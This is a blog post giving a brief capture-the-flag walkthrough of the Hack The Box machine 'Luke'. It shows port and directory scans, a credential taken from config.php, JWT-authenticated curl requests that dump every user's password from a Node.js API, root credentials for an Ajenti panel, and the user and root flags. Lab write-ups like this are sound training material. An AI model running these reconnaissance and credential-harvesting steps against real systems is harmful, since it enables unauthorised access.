Skip to main content

Hackthebox Luke Walkthrough

LUKE -10.10.10.137

Nmap scan result-
nmap -sC -sV 10.10.10.137
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-18 23:03 IST
Nmap scan report for 10.10.10.137
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
22/tcp   open  ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
3000/tcp open  http    Node.js Express framework
8000/tcp open  http    Ajenti http control panel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.94 seconds


gobuster-
10.10.10.137-
gobuster dir -u http://10.10.10.137 -w '/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt' -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.137
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2019/09/18 23:01:56 Starting gobuster
===============================================================
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)

gobuster-
10.10.10.137:3000

gobuster dir -u http://10.10.10.137:3000 -w '/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt'
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.137:3000
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/18 23:02:24 Starting gobuster
===============================================================
/login (Status: 200)
/users (Status: 200)
/Login (Status: 200)
/Users (Status: 200)

Creds--
config.php(10.10.10.137)-root:Zk6heYCyv6ZE9Xcg

  


Auth-
Curl post request----

curl -XPOST http://10.10.10.137:3000/login -d 'username=admin&password=Zk6heYCyv6ZE9Xcg';echo
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODI4OTk1LCJleHAiOjE1Njg5MTUzOTV9.uhbegEBouu6vqm3QtxY5gYWbpuIcw1_sKbxY6sYtves"}

echo -n eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODI4OTk1LCJleHAiOjE1Njg5MTUzOTV9.uhbegEBouu6vqm3QtxY5gYWbpuIcw1_sKbxY6sYtves"} |base64 -d

Information about the token:-
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
data
eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODI4OTk1LCJleHAiOjE1Njg5MTUzOTV9.
signature
uhbegEBouu6vqm3QtxY5gYWbpuIcw1_sKbxY6sYtves
jwt type encoded
hs256 algo

curl http://10.10.10.137:3000/ -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' ; echo
{"message":"Welcome admin ! "}

curl http://10.10.10.137:3000/users -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   181  100   181    0     0    460      0 --:--:-- --:--:-- --:--:--   459
[
  {
    "ID": "1",
    "name": "Admin",
    "Role": "Superuser"
  },
  {
    "ID": "2",
    "name": "Derry",
    "Role": "Web Admin"
  },
  {
    "ID": "3",
    "name": "Yuri",
    "Role": "Beta Tester"
  },
  {
    "ID": "4",
    "name": "Dory",
    "Role": "Supporter"
  }
]

 Admin pass
curl http://10.10.10.137:3000/users/Admin -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    45  100    45    0     0     81      0 --:--:-- --:--:-- --:--:--    81
{
  "name": "Admin",
  "password": "WX5b7)>/rp$U)FW"




Derry pass

curl http://10.10.10.137:3000/users/Derry -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    46  100    46    0     0     21      0  0:00:02  0:00:02 --:--:--    21
{
  "name": "Derry",
  "password": "rZ86wwLvx7jUxtch"

 yuri pass 

  curl http://10.10.10.137:3000/users/Yuri -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    41  100    41    0     0     94      0 --:--:-- --:--:-- --:--:--    94
{
  "name": "Yuri",
  "password": "bet@tester87"
 
  duri pass


curl http://10.10.10.137:3000/users/Dory -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4ODMwMzMyLCJleHAiOjE1Njg5MTY3MzJ9.VSAfIKjSF762JJbJRhgvpEgw28pvdfCRPXKPc2ega0Q' | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    44  100    44    0     0    109      0 --:--:-- --:--:-- --:--:--   109
{
  "name": "Dory",
  "password": "5y:!xa=ybfe)/QD"

port 8000

root:KpMasng6S5EtTy9Z


 10.10.10.137/8000  - passward & user root





 cat user.txt-- 58d441e500e8941f9cf3ba
 root-8448343028fadde1e2a1b  



                                                                                                                                  
                                                                                                                                                                                                                                                         


Labels:

Comments

Post a Comment

Popular posts from this blog

NMAP and ZenMAP

NMAP and ZenMAP are useful tools for the scanning phase of Ethical Hacking in Kali Linux. NMAP and ZenMAP are practically the same tool, however NMAP uses command line while ZenMAP has a GUI. NMAP is a free utility tool for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. NMAP uses raw IP packets in novel ways to determine which hosts are available on the network, what services (application name and version) those hosts are offering, which operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, etc. Now, let’s go step by step and learn how to use NMAP and ZenMAP. Step 1 − To open, go to Applications → 01-Information Gathering → nmap or zenmap. Step 2 − The next step is to detect the OS type/version of the target host. Based on the help indicat...
Post a Comment
Read more

Summer Industrial Training

Summer Indusrial Training with Allinone Cyberteam Pvt.Ltd. Training is teaching, or developing in oneself or others, any skills and knowledge that relate to specific useful competencies. Training has specific goals of improving one's capability, capacity, productivity and performance. It forms the core of apprenticeships and provides the backbone of content at institutes of technology (also known as technical colleges or polytechnics). In addition to the basic training required for a trade, occupation or profession, observers of the labor-market recognize as of 2008 the need to continue training beyond initial qualifications: to maintain, upgrade and update skills throughout working life. People within many professions and occupations may refer to this sort of training as professional development.
Post a Comment
Read more

Steganography

•Steganography from the Greek word steganos meaning “covered” and the Greek word graphie meaning “writing” •Process of hiding of a secret message within an ordinary message and extracting it at its destination •Anyone else viewing the message will fail to know it contains hidden/encrypted data This can be achieved by concealing the existence of information within seemingly harmless carriers or cover Carrier: Text, Image, Audio, Video, etc. History Of Steganography  Steganography ancient origins can be traced back to 440 BC, from the Histories of Herodotus Demeratus sent a warning about a forthcoming attack to Greece by writing it on a wooden panel and covering it in wax. Histiaeus, who shaved the head of his most trusted slave and tattooed a message on it. After his hair had grown the message was hidden. The purpose was to instigate a revolt against the Persians Techniques Of Steganography Masking and Filtering: Information is hidden inside of a image using digital...
Post a Comment
Read more